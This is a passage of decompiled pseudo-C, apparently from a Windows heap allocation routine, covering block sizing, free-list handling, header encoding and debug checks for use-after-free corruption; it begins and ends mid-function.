				signed short _t867;
				signed int _t869;
				intOrPtr _t870;
				intOrPtr* _t871;
				intOrPtr _t872;
				intOrPtr* _t873;
				intOrPtr _t875;
				signed int _t878;
				signed int _t886;
				signed int _t887;
				intOrPtr _t889;
				signed short _t890;
				signed short _t893;
				unsigned int _t897;
				signed short _t899;
				intOrPtr _t903;
				intOrPtr _t904;
				signed char* _t906;
				signed short _t907;
				signed int _t908;
				signed int _t918;
				signed int* _t919;
				signed int _t924;
				signed short _t925;
				intOrPtr* _t927;
				signed short _t928;
				signed int _t935;
				intOrPtr _t938;
				intOrPtr _t939;
				signed short _t941;
				signed int _t943;
				signed int* _t944;
				signed int _t949;
				signed short _t950;
				signed short _t953;
				signed short _t954;
				signed int _t956;
				signed short _t961;
				signed int _t962;
				intOrPtr _t965;
				signed int _t966;
				signed short _t973;
				signed short _t975;
				signed short _t976;
				signed int _t977;
				signed int _t979;
				signed int _t981;
				signed int _t982;
				signed short _t983;
				signed short _t989;
				void* _t994;
				void* _t995;

				_t972 = __esi;
				_t898 = __edx;
				_push(0xb0);
				_push(0x8fc960);
				E008FDF5C(__ebx, __edi, __esi);
				 *(_t994 - 0x3c) = __edx;
				_t760 = __ecx;
				 *(_t994 - 0x20) = __ecx;
				_t769 = 1;
				 *(_t994 - 0x44) = 1;
				 *((char*)(_t994 - 0x21)) = 0;
				_t953 = 0;
				 *(_t994 - 0x30) = 0;
				 *(_t994 - 0x28) = 0;
				 *(_t994 - 0x58) = 0;
				 *((intOrPtr*)(_t994 - 0x70)) = 0;
				if((__edx & 0x7d010f60) != 0 ||  *(_t994 + 8) >= 0x80000000) {
					 *(_t994 - 0x44) = _t953;
					 *( *(_t994 + 0x14)) = 4;
					__eflags =  *(_t994 + 8) - 0x7fffffff;
					if( *(_t994 + 8) > 0x7fffffff) {
						_t574 = 0;
						goto L70;
					}
					__eflags = _t898 & 0x61000000;
					if((_t898 & 0x61000000) != 0) {
						__eflags = _t898 & 0x10000000;
						if(__eflags != 0) {
							goto L198;
						}
						_t574 = E009A0F0E(_t760, _t898, _t953, _t972, __eflags, _t760, _t898,  *(_t994 + 8));
						goto L70;
					}
					L198:
					__eflags =  *(_t994 + 8) - _t953;
					if( *(_t994 + 8) != _t953) {
						_t769 =  *(_t994 + 8);
					}
					_t578 =  *((intOrPtr*)(_t760 + 0x98)) + _t769 &  *(_t760 + 0x9c);
					 *(_t994 + 0xc) = _t578;
					_t773 = _t898 >> 0x00000004 & 0x000000e1 | 0x00000001;
					 *(_t994 - 0x19) = _t773;
					__eflags = _t898 & 0x3c000100;
					if((_t898 & 0x3c000100) == 0) {
						__eflags =  *((intOrPtr*)(_t760 + 0xc0)) - _t953;
						if(__eflags == 0) {
							goto L202;
						}
						goto L201;
					} else {
						L201:
						 *(_t994 - 0x19) = _t773 | 0x00000002;
						_t578 = _t578 + 8;
						__eflags = _t578;
						 *(_t994 + 0xc) = _t578;
						L202:
						 *(_t994 - 0x2c) = _t578 >> 3;
						_t973 =  *(_t994 + 0x10);
						goto L6;
					}
				} else {
					_t973 =  *(_t994 + 0x10);
					if(_t973 == 0) {
						__eflags =  *(_t994 + 8);
						if(__eflags == 0) {
							_t754 = 1;
						} else {
							_t754 =  *(_t994 + 8);
						}
						_t756 = _t754 + 0x0000000f & 0xfffffff8;
						 *(_t994 + 0xc) = _t756;
					} else {
						_t756 =  *(_t994 + 0xc);
					}
					 *(_t994 - 0x19) = 1;
					_t897 = _t756 >> 3;
					 *(_t994 - 0x2c) = _t897;
					if(_t897 < 2) {
						 *(_t994 + 0xc) = _t756 + 8;
						 *(_t994 - 0x2c) = 2;
					}
					 *( *(_t994 + 0x14)) = 3;
					L6:
					if((_t898 & 0x00800000) != 0) {
						 *(_t994 - 0x19) =  *(_t994 - 0x19) | 0x00000008;
					}
					 *(_t994 - 4) = _t953;
					_t1003 = _t898 & 0x00000001;
					if((_t898 & 0x00000001) != 0) {
						L12:
						_t580 =  *(_t994 - 0x2c);
						if( *(_t994 - 0x2c) >  *((intOrPtr*)(_t760 + 0x60))) {
							__eflags =  *(_t760 + 0x40) & 0x00000002;
							if(( *(_t760 + 0x40) & 0x00000002) != 0) {
								 *(_t994 + 0xc) =  *(_t994 + 0xc) + 0x18;
								_t761 =  *(_t994 - 0x20);
								_t582 = E0098E1E7(_t761, 1);
								_push(_t582);
								_push(0x1000);
								_push(_t994 + 0xc);
								_push(0);
								_push(_t994 - 0x28);
								_t580 = E008EFAD0(0xffffffff);
								__eflags = _t580;
								if(_t580 < 0) {
									 *((intOrPtr*)(_t761 + 0x10c)) =  *((intOrPtr*)(_t761 + 0x10c)) + 1;
									L243:
									 *(_t994 - 0x30) =  *(_t994 - 0x30) & 0x00000000;
									L312:
									_t761 =  *(_t994 - 0x20);
								} else {
									__eflags =  *0x7ffe0380;
									if( *0x7ffe0380 != 0) {
										_t590 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t590 + 0x240) & 0x00000001;
										if(( *(_t590 + 0x240) & 0x00000001) != 0) {
											E0099EF82(_t761,  *(_t994 - 0x28),  *(_t994 + 0xc), 9);
										}
										__eflags =  *0x7ffe0380;
										if( *0x7ffe0380 != 0) {
											__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
											if(__eflags != 0) {
												E0099F415(_t898, __eflags, _t761,  *(_t994 - 0x28),  *(_t994 + 0xc),  *(_t761 + 0x78) << 3,  *0x7ffe0380 & 0x000000ff);
											}
										}
									}
									__eflags =  *0x7ffe038a;
									if(__eflags != 0) {
										E0099F415(_t898, __eflags, _t761,  *(_t994 - 0x28),  *(_t994 + 0xc),  *(_t761 + 0x78) << 3,  *0x7ffe038a & 0x000000ff);
									}
									 *((short*)( *(_t994 - 0x28) + 0x18)) =  *(_t994 + 0xc) -  *(_t994 + 8);
									 *( *(_t994 - 0x28) + 0x1a) =  *(_t994 - 0x19) & 0x000000ff | 0x00000002;
									 *( *(_t994 - 0x28) + 0x10) =  *(_t994 + 0xc);
									 *( *(_t994 - 0x28) + 0x14) =  *(_t994 + 0xc);
									 *((char*)( *(_t994 - 0x28) + 0x1f)) = 4;
									 *((intOrPtr*)(_t761 + 0xe8)) =  *((intOrPtr*)(_t761 + 0xe8)) +  *(_t994 + 0xc);
									__eflags =  *(_t761 + 0x40) & 0x08000000;
									if(( *(_t761 + 0x40) & 0x08000000) != 0) {
										 *((short*)( *(_t994 - 0x28) + 8)) = E00999AF6();
									}
									_t604 = E00908131();
									__eflags = _t604 & 0x00000800;
									if((_t604 & 0x00000800) != 0) {
										 *((short*)( *(_t994 - 0x28) + 0xa)) = E0098E3A7(_t761,  *(_t994 - 0x3c) >> 0x00000012 & 0x000000ff, 0,  *( *(_t994 - 0x28) + 0x10) >> 3, 1);
									}
									_t899 =  *(_t994 - 0x28);
									_t612 = _t899 + 0x18;
									__eflags =  *(_t761 + 0x4c);
									if( *(_t761 + 0x4c) != 0) {
										_t612[1] = _t612[1] & 0x000000ff ^ _t612[0] & 0x000000ff ^  *_t612 & 0x000000ff;
										 *_t612 =  *_t612 ^  *(_t761 + 0x50);
										__eflags =  *_t612;
										_t899 =  *(_t994 - 0x28);
									}
									_t613 = _t761 + 0xa0;
									_t780 =  *(_t613 + 4);
									_t975 =  *_t780;
									__eflags = _t975 - _t613;
									if(__eflags != 0) {
										_push(0);
										_push(_t975);
										_push(0);
										_push(_t613);
										_push(0);
										_push(0xc);
										E0099F840(_t761, 0, _t899, _t953, _t975, __eflags);
									} else {
										 *_t899 = _t613;
										 *(_t899 + 4) = _t780;
										 *_t780 = _t899;
										 *(_t613 + 4) = _t899;
									}
									_t580 =  *(_t994 - 0x28) + 0x20;
									 *(_t994 - 0x30) =  *(_t994 - 0x28) + 0x20;
								}
								goto L68;
							}
							goto L243;
						}
						if(_t973 == _t953) {
							L19:
							 *(_t994 - 0x38) = _t760 + 0xc4;
							_t954 =  *(_t760 + 0xb8);
							while(1) {
								 *(_t994 - 0xc0) = _t954;
								_t624 =  *((intOrPtr*)(_t954 + 4));
								_t786 =  *(_t994 - 0x2c);
								if(_t786 < _t624) {
									break;
								}
								_t787 =  *_t954;
								__eflags = _t787;
								if(_t787 == 0) {
									_t625 = _t624 - 1;
									L89:
									 *(_t994 - 0x84) = _t625;
									L73:
									 *(_t994 - 0x9c) = _t954;
									_t789 =  *(_t994 - 0x84) -  *(_t954 + 0x14);
									_t902 =  *(_t954 + 0x18);
									 *(_t994 + 0x10) = _t902;
									_t626 =  *(_t902 + 4);
									 *(_t994 - 0x94) = _t626;
									if(_t902 == _t626) {
										 *(_t994 - 0x34) = _t902;
										L27:
										_t976 =  *(_t994 - 0x34);
										__eflags = _t976;
										if(_t976 == 0) {
											_t954 =  *_t954;
											_t625 =  *(_t954 + 0x14);
											_t760 =  *(_t994 - 0x20);
											goto L89;
										}
										__eflags =  *(_t994 - 0x38) - _t976;
										if( *(_t994 - 0x38) == _t976) {
											L174:
											_t955 =  *(_t994 - 0x20);
											_t982 = E0090AD79(_t902, _t955,  *(_t994 + 0xc));
											 *(_t994 + 0x14) = _t982;
											__eflags = _t982;
											if(_t982 == 0) {
												goto L243;
											}
											_t327 = _t982 + 8; // 0x8
											_t627 = _t327;
											_t903 =  *_t627;
											 *((intOrPtr*)(_t994 - 0x48)) = _t903;
											_t790 =  *((intOrPtr*)(_t982 + 0xc));
											 *((intOrPtr*)(_t994 - 0x68)) = _t790;
											_t791 =  *_t790;
											_t904 =  *((intOrPtr*)(_t903 + 4));
											__eflags = _t791 - _t904;
											if(__eflags != 0) {
												L268:
												_push(0);
												_push(_t791);
												_push(_t904);
												_push(_t627);
												_push(_t955);
												L263:
												_push(0xc);
												_t580 = E0099F840(_t760, _t791, _t904, _t955, _t982, __eflags);
												goto L312;
											}
											__eflags = _t791 - _t627;
											if(__eflags != 0) {
												goto L268;
											}
											 *((intOrPtr*)(_t955 + 0x78)) =  *((intOrPtr*)(_t955 + 0x78)) - ( *_t982 & 0x0000ffff);
											_t629 =  *(_t955 + 0xb8);
											__eflags = _t629;
											if(_t629 == 0) {
												L53:
												_t630 =  *((intOrPtr*)(_t994 - 0x48));
												_t792 =  *((intOrPtr*)(_t994 - 0x68));
												 *_t792 = _t630;
												 *((intOrPtr*)(_t630 + 4)) = _t792;
												_t109 = _t982 + 2; // 0x2
												_t631 = _t109;
												 *(_t994 + 0x10) = _t631;
												__eflags =  *_t631 & 0x00000008;
												if(__eflags != 0) {
													_t632 = E009261FE(_t982, __eflags);
													__eflags = _t632;
													if(_t632 != 0) {
														goto L54;
													}
													_t580 = E0091EE4C(_t760, _t955,  *(_t994 - 0x20), _t982,  *_t982 & 0x0000ffff, 1);
													goto L312;
												}
												L54:
												_t762 =  *(_t994 + 0x10);
												_t633 =  *_t762;
												 *(_t994 - 0xa0) = _t633;
												__eflags =  *(_t994 - 0x44);
												if( *(_t994 - 0x44) == 0) {
													__eflags = _t633 & 0x00000004;
													if((_t633 & 0x00000004) != 0) {
														_t961 = ( *_t982 & 0x0000ffff) * 8 - 0x10;
														 *(_t994 - 0xb0) = _t961;
														__eflags = _t633 & 0x00000002;
														if((_t633 & 0x00000002) != 0) {
															__eflags = _t961 - 4;
															if(_t961 > 4) {
																_t961 = _t961 - 4;
																__eflags = _t961;
																 *(_t994 - 0xb0) = _t961;
															}
														}
														_t480 = _t982 + 0x10; // 0x10
														_t674 = E00928950(_t480, _t961, 0xfeeefeee);
														 *((intOrPtr*)(_t994 - 0x48)) = _t674;
														__eflags = _t674 - _t961;
														if(_t674 != _t961) {
															_t676 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
															__eflags =  *(_t676 + 0xc);
															if( *(_t676 + 0xc) == 0) {
																_push("HEAP: ");
																E0094373B();
															} else {
																E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
															}
															_t982 =  *(_t994 + 0x14);
															_push( *((intOrPtr*)(_t994 - 0x48)) + _t982 + 0x10);
															E0094373B("HEAP: Free Heap block %lx modified at %lx after it was freed\n", _t982);
															_t995 = _t995 + 0xc;
															E009A06F9(_t982);
														}
													}
												}
												 *_t762 =  *(_t994 - 0x19);
												_t956 =  *(_t994 - 0x2c);
												_t795 = ( *_t982 & 0x0000ffff) - _t956;
												 *(_t994 - 0xa4) = _t795;
												 *_t982 = _t956;
												_t636 =  *(_t994 + 0xc) -  *(_t994 + 8);
												 *(_t994 - 0x38) = _t636;
												_t122 = _t982 + 7; // 0x7
												_t906 = _t122;
												__eflags = _t636 - 0x3f;
												if(_t636 >= 0x3f) {
													 *(_t994 - 0x60) = _t906;
													_t761 =  *(_t994 - 0x20);
													__eflags =  *_t906 & 0x00000080;
													if(( *_t906 & 0x00000080) == 0) {
														__eflags =  *(_t761 + 0x4c);
														if( *(_t761 + 0x4c) == 0) {
															_t907 = _t956 & 0x0000ffff;
														} else {
															_t989 =  *_t982;
															 *(_t994 - 0x90) = _t989;
															__eflags =  *(_t761 + 0x4c) & _t989;
															if(( *(_t761 + 0x4c) & _t989) != 0) {
																_t989 = _t989 ^  *(_t761 + 0x50);
																__eflags = _t989;
																 *(_t994 - 0x90) = _t989;
															}
															_t907 = _t989 & 0x0000ffff;
															_t982 =  *(_t994 + 0x14);
															_t795 =  *(_t994 - 0xa4);
														}
														_t908 = _t907 & 0x0000ffff;
													} else {
														_t908 =  *(( *_t982 ^ _t982 >> 0x00000003 ^  *0x9d00a4 ^ _t761) + 0x10) & 0x0000ffff;
														_t982 =  *(_t994 + 0x14);
														_t795 =  *(_t994 - 0xa4);
													}
													_t508 = _t908 * 8; // -4
													 *( *(_t994 - 0x60)) = 0x3f;
													 *(_t982 + _t508 - 4) = _t636;
													_t956 =  *(_t994 - 0x2c);
													_t906 =  *(_t994 - 0x60);
												} else {
													 *_t906 = _t636;
													_t761 =  *(_t994 - 0x20);
												}
												_t124 = _t982 + 3; // 0x3
												_t637 = _t124;
												 *(_t994 - 0x2c) = _t637;
												 *_t637 = 0;
												__eflags = _t795;
												if(_t795 == 0) {
													L62:
													_t133 = _t982 + 8; // 0x8
													_t580 = _t133;
													 *(_t994 - 0x30) = _t133;
													__eflags =  *(_t994 - 0x44);
													if( *(_t994 - 0x44) == 0) {
														__eflags =  *(_t994 - 0x3c) & 0x00000008;
														if(( *(_t994 - 0x3c) & 0x00000008) != 0) {
															 *(_t994 - 0x58) =  *(_t994 + 8);
														} else {
															__eflags =  *(_t761 + 0x40) & 0x00000040;
															if(( *(_t761 + 0x40) & 0x00000040) != 0) {
																E009289F0(_t580,  *(_t994 + 8) & 0xfffffffc, 0xbaadf00d);
															}
														}
														__eflags =  *(_t761 + 0x40) & 0x00000020;
														if(( *(_t761 + 0x40) & 0x00000020) != 0) {
															asm("stosd");
															asm("stosd");
															 *( *(_t994 + 0x10)) =  *( *(_t994 + 0x10)) & 0x000000ff | 0x00000004;
														}
														 *( *(_t994 - 0x2c)) = 0;
														_t642 =  *(_t994 + 0x10);
														__eflags =  *_t642 & 0x00000002;
														if(( *_t642 & 0x00000002) == 0) {
															_t643 = E00908131();
															__eflags = _t643 & 0x00000800;
															if((_t643 & 0x00000800) != 0) {
																 *( *(_t994 - 0x2c)) = E0098E3A7(_t761,  *(_t994 - 0x3c) >> 0x00000012 & 0x000000ff, 0,  *_t982 & 0x0000ffff, 0);
															}
														} else {
															 *(_t994 - 0x74) = E00922568(_t982);
															asm("stosd");
															asm("stosd");
															__eflags =  *(_t761 + 0x40) & 0x08000000;
															if(( *(_t761 + 0x40) & 0x08000000) != 0) {
																 *( *(_t994 - 0x74)) = E00999AF6();
															}
															_t652 = E00908131();
															__eflags = _t652 & 0x00000800;
															if((_t652 & 0x00000800) != 0) {
																 *((short*)( *(_t994 - 0x74) + 2)) = E0098E3A7(_t761,  *(_t994 - 0x3c) >> 0x00000012 & 0x00000fff, 0,  *_t982 & 0x0000ffff, 0);
															}
														}
														_t580 = 0;
														__eflags =  *(_t761 + 0x4c);
														if( *(_t761 + 0x4c) != 0) {
															 *( *(_t994 - 0x2c)) =  *(_t982 + 1) & 0x000000ff ^  *_t982 & 0x000000ff ^  *( *(_t994 + 0x10)) & 0x000000ff;
															 *_t982 =  *_t982 ^  *(_t761 + 0x50);
															__eflags =  *_t982;
														}
														__eflags =  *(_t994 - 0x58) - _t580;
														if( *(_t994 - 0x58) != _t580) {
															_push( *(_t994 - 0x58));
															_push(_t580);
															L108:
															_push( *(_t994 - 0x30));
															_t580 = E008FDFC0();
														}
														goto L68;
													}
													__eflags =  *(_t761 + 0x4c);
													if( *(_t761 + 0x4c) != 0) {
														 *( *(_t994 - 0x2c)) =  *(_t982 + 1) & 0x000000ff ^  *_t982 & 0x000000ff ^  *( *(_t994 + 0x10)) & 0x000000ff;
														_t580 =  *(_t761 + 0x50);
														 *_t982 =  *_t982 ^  *(_t761 + 0x50);
														__eflags =  *_t982;
													}
													__eflags =  *((char*)(_t994 - 0x21));
													if( *((char*)(_t994 - 0x21)) != 0) {
														_t580 = E008F2290( *((intOrPtr*)(_t761 + 0xcc)));
														 *((char*)(_t994 - 0x21)) = 0;
													}
													__eflags =  *(_t994 - 0x3c) & 0x00000008;
													if(( *(_t994 - 0x3c) & 0x00000008) != 0) {
														_push( *(_t994 + 8));
														_push(0);
														goto L108;
													} else {
														goto L68;
													}
												} else {
													__eflags = _t795 - 1;
													if(_t795 == 1) {
														_t211 = ( *_t982 & 0x0000ffff) + 1; // 0x4
														_t812 = _t211;
														 *_t982 = _t812;
														_t665 =  *(_t994 + 0xc) -  *(_t994 + 8) + 8;
														 *(_t994 - 0xa0) = _t665;
														__eflags = _t665 - 0x3f;
														if(_t665 >= 0x3f) {
															__eflags =  *_t906 & 0x00000080;
															if(( *_t906 & 0x00000080) == 0) {
																__eflags =  *(_t761 + 0x4c);
																if( *(_t761 + 0x4c) == 0) {
																	_t813 = _t812 & 0x0000ffff;
																	L294:
																	_t525 = (_t813 & 0x0000ffff) * 8; // -4
																	 *_t906 = 0x3f;
																	 *(_t982 + _t525 - 4) = _t665;
																	goto L62;
																}
																_t983 =  *_t982;
																 *(_t994 - 0x88) = _t983;
																__eflags =  *(_t761 + 0x4c) & _t983;
																if(( *(_t761 + 0x4c) & _t983) != 0) {
																	_t983 = _t983 ^  *(_t761 + 0x50);
																	__eflags = _t983;
																	 *(_t994 - 0x88) = _t983;
																}
																_t813 = _t983 & 0x0000ffff;
																L292:
																_t982 =  *(_t994 + 0x14);
																goto L294;
															}
															_t813 =  *(( *_t982 ^ _t982 >> 0x00000003 ^  *0x9d00a4 ^ _t761) + 0x10);
															goto L292;
														}
														 *_t906 = _t665;
														goto L62;
													}
													_t666 =  *((intOrPtr*)(_t982 + 6));
													__eflags = _t666;
													if(_t666 != 0) {
														_t918 = (_t982 & 0xffff0000) - _t666 + 0x10000;
													} else {
														_t918 = _t761;
													}
													__eflags =  *(_t994 - 0x44);
													__eflags = E0090351F(_t761, _t918, _t982 + _t956 * 8,  *(_t994 - 0xa0), (_t666 & 0xffffff00 |  *(_t994 - 0x44) == 0x00000000) & 0x000000ff, _t956, _t795);
													if(__eflags == 0) {
														_t672 = 0xc000003c;
														goto L249;
													} else {
														goto L62;
													}
												}
											}
											_t962 =  *_t982 & 0x0000ffff;
											while(1) {
												 *(_t994 - 0xbc) = _t629;
												_t825 =  *(_t629 + 4);
												__eflags = _t962 - _t825;
												if(_t962 < _t825) {
													break;
												}
												_t925 =  *_t629;
												__eflags = _t925;
												if(_t925 == 0) {
													 *(_t994 - 0x7c) = _t825 - 1;
													L165:
													_t827 =  *(_t994 - 0x7c) -  *((intOrPtr*)(_t629 + 0x14));
													 *(_t994 + 0x10) = _t827;
													__eflags =  *(_t629 + 8);
													if( *(_t629 + 8) != 0) {
														_t827 = _t827 + _t827;
														__eflags = _t827;
													}
													_t955 = _t827 << 2;
													_t919 = _t955 +  *((intOrPtr*)(_t629 + 0x20));
													 *(_t994 - 0x38) =  *_t919;
													 *((intOrPtr*)(_t629 + 0xc)) =  *((intOrPtr*)(_t629 + 0xc)) - 1;
													__eflags =  *(_t994 - 0x7c) -  *(_t629 + 4) - 1;
													if( *(_t994 - 0x7c) ==  *(_t629 + 4) - 1) {
														 *((intOrPtr*)(_t629 + 0x10)) =  *((intOrPtr*)(_t629 + 0x10)) - 1;
													}
													_t314 = _t982 + 8; // 0x8
													__eflags =  *(_t994 - 0x38) - _t314;
													if( *(_t994 - 0x38) != _t314) {
														goto L53;
													} else {
														 *(_t994 - 0x50) =  *(_t629 + 4);
														__eflags =  *_t629;
														if( *_t629 == 0) {
															_t318 = _t994 - 0x50;
															 *_t318 =  *(_t994 - 0x50) - 1;
															__eflags =  *_t318;
														}
														__eflags =  *(_t994 - 0x7c) -  *(_t994 - 0x50);
														if( *(_t994 - 0x7c) >=  *(_t994 - 0x50)) {
															L103:
															_t835 =  *(_t982 + 8);
															__eflags = _t835 -  *((intOrPtr*)(_t629 + 0x18));
															if(_t835 !=  *((intOrPtr*)(_t629 + 0x18))) {
																 *_t919 = _t835;
																goto L53;
															}
															 *_t919 =  *_t919 & 0x00000000;
															goto L52;
														} else {
															_t924 =  *(_t982 + 8);
															__eflags = _t924 -  *((intOrPtr*)(_t629 + 0x18));
															if(_t924 ==  *((intOrPtr*)(_t629 + 0x18))) {
																L51:
																_t838 =  *((intOrPtr*)(_t629 + 0x20));
																_t100 = _t955 + _t838;
																 *_t100 =  *(_t955 + _t838) & 0x00000000;
																__eflags =  *_t100;
																L52:
																_t836 =  *(_t994 + 0x10);
																_t955 = _t836 >> 5;
																_t690 =  *((intOrPtr*)(_t629 + 0x1c)) + (_t836 >> 5) * 4;
																 *_t690 =  *_t690 &  !(1 << (_t836 & 0x0000001f));
																__eflags =  *_t690;
																goto L53;
															}
															_t763 =  *(_t994 - 0x20);
															__eflags =  *(_t763 + 0x4c);
															if( *(_t763 + 0x4c) == 0) {
																L239:
																_t839 =  *(_t924 - 8) & 0x0000ffff;
																goto L50;
															} else {
																_t841 =  *(_t924 - 8);
																 *(_t994 - 0x80) = _t841;
																__eflags =  *(_t763 + 0x4c) & _t841;
																if(( *(_t763 + 0x4c) & _t841) != 0) {
																	_t841 = _t841 ^  *(_t763 + 0x50);
																	 *(_t994 - 0x80) = _t841;
																}
																L49:
																_t839 = _t841 & 0x0000ffff;
																_t982 =  *(_t994 + 0x14);
																L50:
																_t760 = ( *_t982 & 0x0000ffff) == (_t839 & 0x0000ffff);
																__eflags = ( *_t982 & 0x0000ffff) == (_t839 & 0x0000ffff);
																if(( *_t982 & 0x0000ffff) == (_t839 & 0x0000ffff)) {
																	 *(_t955 +  *((intOrPtr*)(_t629 + 0x20))) = _t924;
																	goto L53;
																}
																goto L51;
															}
															goto L174;
														}
													}
												}
												_t629 = _t925;
											}
											 *(_t994 - 0x7c) = _t962;
											goto L165;
										}
										_t982 = _t976 + 0xfffffff8;
										 *(_t994 + 0x14) = _t982;
										_t692 =  *(_t994 - 0x20);
										__eflags =  *(_t692 + 0x4c);
										if( *(_t692 + 0x4c) != 0) {
											 *_t982 =  *_t982 ^  *(_t692 + 0x50);
											__eflags =  *(_t982 + 3) - ( *(_t982 + 2) ^  *(_t982 + 1) ^  *_t982);
											if(__eflags != 0) {
												_push(0);
												_push(_t982);
												_push(_t692);
												E0099F8EE(_t760, _t954, _t982, __eflags);
												_t692 =  *(_t994 - 0x20);
											}
										}
										_t760 =  *_t982 & 0x0000ffff;
										__eflags = _t760 -  *(_t994 - 0x2c);
										if(_t760 <  *(_t994 - 0x2c)) {
											__eflags =  *(_t692 + 0x4c);
											if( *(_t692 + 0x4c) != 0) {
												_t902 =  *_t982 & 0x000000ff;
												 *(_t982 + 3) =  *(_t982 + 2) & 0x000000ff ^  *(_t982 + 1) & 0x000000ff ^  *_t982 & 0x000000ff;
												 *_t982 =  *_t982 ^  *(_t692 + 0x50);
											}
											goto L174;
										}
										_t791 = _t982 + 8;
										_t965 =  *_t791;
										 *((intOrPtr*)(_t994 - 0x48)) = _t965;
										_t927 =  *((intOrPtr*)(_t982 + 0xc));
										 *((intOrPtr*)(_t994 - 0x68)) = _t927;
										_t904 =  *_t927;
										_t955 =  *(_t965 + 4);
										__eflags = _t904 - _t955;
										if(__eflags != 0) {
											L240:
											_push(0);
											_push(_t904);
											_push(_t955);
											_push(_t791);
											_push( *(_t994 - 0x20));
											goto L263;
										}
										__eflags = _t904 - _t791;
										if(__eflags != 0) {
											goto L240;
										}
										 *((intOrPtr*)(_t692 + 0x78)) =  *((intOrPtr*)(_t692 + 0x78)) - _t760;
										_t629 =  *(_t692 + 0xb8);
										__eflags = _t629;
										if(_t629 == 0) {
											goto L53;
										} else {
											_t966 =  *_t982 & 0x0000ffff;
											while(1) {
												 *(_t994 - 0xb4) = _t629;
												_t846 =  *(_t629 + 4);
												__eflags = _t966 - _t846;
												if(_t966 < _t846) {
													 *(_t994 - 0x8c) = _t966;
													break;
												}
												_t928 =  *_t629;
												__eflags = _t928;
												if(_t928 == 0) {
													 *(_t994 - 0x8c) = _t846 - 1;
													break;
												}
												_t629 = _t928;
											}
											_t849 =  *(_t994 - 0x8c) -  *((intOrPtr*)(_t629 + 0x14));
											 *(_t994 + 0x10) = _t849;
											__eflags =  *(_t629 + 8);
											if( *(_t629 + 8) != 0) {
												_t849 = _t849 + _t849;
												__eflags = _t849;
											}
											_t955 = _t849 << 2;
											_t919 = _t955 +  *((intOrPtr*)(_t629 + 0x20));
											 *(_t994 - 0x38) =  *_t919;
											 *((intOrPtr*)(_t629 + 0xc)) =  *((intOrPtr*)(_t629 + 0xc)) - 1;
											__eflags =  *(_t994 - 0x8c) -  *(_t629 + 4) - 1;
											if( *(_t994 - 0x8c) ==  *(_t629 + 4) - 1) {
												 *((intOrPtr*)(_t629 + 0x10)) =  *((intOrPtr*)(_t629 + 0x10)) - 1;
											}
											__eflags =  *(_t994 - 0x38) - _t982 + 8;
											if( *(_t994 - 0x38) != _t982 + 8) {
												goto L53;
											} else {
												 *(_t994 - 0x54) =  *(_t629 + 4);
												__eflags =  *_t629;
												if( *_t629 == 0) {
													_t83 = _t994 - 0x54;
													 *_t83 =  *(_t994 - 0x54) - 1;
													__eflags =  *_t83;
												}
												__eflags =  *(_t994 - 0x8c) -  *(_t994 - 0x54);
												if( *(_t994 - 0x8c) >=  *(_t994 - 0x54)) {
													goto L103;
												}
												_t924 =  *(_t982 + 8);
												__eflags = _t924 -  *((intOrPtr*)(_t629 + 0x18));
												if(_t924 ==  *((intOrPtr*)(_t629 + 0x18))) {
													goto L51;
												}
												_t765 =  *(_t994 - 0x20);
												__eflags =  *(_t765 + 0x4c);
												if( *(_t765 + 0x4c) == 0) {
													goto L239;
												}
												_t841 =  *(_t924 - 8);
												 *(_t994 - 0x64) = _t841;
												__eflags =  *(_t765 + 0x4c) & _t841;
												if(( *(_t765 + 0x4c) & _t841) != 0) {
													_t841 = _t841 ^  *(_t765 + 0x50);
													__eflags = _t841;
													 *(_t994 - 0x64) = _t841;
												}
												goto L49;
											}
										}
									}
									_t977 =  *(_t760 + 0x4c);
									if(_t977 == 0) {
										_t695 =  *(_t626 - 8) & 0x0000ffff;
									} else {
										_t724 =  *(_t626 - 8);
										 *(_t994 - 0x4c) = _t724;
										_t977 =  *(_t760 + 0x4c);
										if((_t724 & _t977) != 0) {
											_t724 = _t724 ^  *(_t760 + 0x50);
											 *(_t994 - 0x4c) = _t724;
										}
										_t695 = _t724 & 0x0000ffff;
									}
									_t902 =  *(_t994 - 0x2c) - (_t695 & 0x0000ffff);
									if( *(_t994 - 0x2c) - (_t695 & 0x0000ffff) > 0) {
										_t697 =  *(_t994 + 0x10);
										goto L26;
									} else {
										_t902 =  *(_t994 + 0x10);
										_t699 =  *_t902 - 8;
										if(_t977 == 0) {
											_t700 =  *_t699 & 0x0000ffff;
										} else {
											_t723 =  *_t699;
											 *(_t994 - 0x6c) = _t723;
											_t977 =  *(_t760 + 0x4c);
											if((_t723 & _t977) != 0) {
												_t723 = _t723 ^  *(_t760 + 0x50);
												 *(_t994 - 0x6c) = _t723;
											}
											_t700 = _t723 & 0x0000ffff;
										}
										_t760 =  *(_t994 - 0x2c) - (_t700 & 0x0000ffff);
										if( *(_t994 - 0x2c) - (_t700 & 0x0000ffff) <= 0) {
											_t697 =  *_t902;
											goto L26;
										} else {
											if( *_t954 != 0 ||  *(_t994 - 0x84) !=  *((intOrPtr*)(_t954 + 4)) - 1) {
												_t979 = _t789 >> 5;
												_t902 = ( *((intOrPtr*)(_t954 + 4)) -  *(_t954 + 0x14) >> 5) - 1;
												_t760 =  *((intOrPtr*)(_t954 + 0x1c)) + _t979 * 4;
												_t708 =  !((1 << (_t789 & 0x0000001f)) - 1) &  *_t760;
												while(1) {
													 *(_t994 - 0xac) = _t760;
													 *(_t994 - 0x98) = _t979;
													if(_t708 != 0) {
														break;
													}
													if(_t979 > _t902) {
														__eflags = _t708;
														if(_t708 == 0) {
															 *(_t994 - 0x34) =  *(_t994 - 0x34) & 0x00000000;
															goto L27;
														}
														break;
													}
													_t760 = _t760 + 4;
													_t708 =  *_t760;
													_t979 = _t979 + 1;
												}
												__eflags = _t708 & 0x0000ffff;
												if((_t708 & 0x0000ffff) != 0) {
													_t902 = _t708 & 0x000000ff;
													__eflags = _t902;
													if(_t902 == 0) {
														_t188 = (_t708 >> 0x00000008 & 0x000000ff) + 0x9037f8; // 0x10008
														_t712 = ( *_t188 & 0x000000ff) + 8;
													} else {
														_t187 = _t902 + 0x9037f8; // 0x10008
														_t712 =  *_t187 & 0x000000ff;
													}
												} else {
													_t867 = _t708 >> 0x00000010 & 0x000000ff;
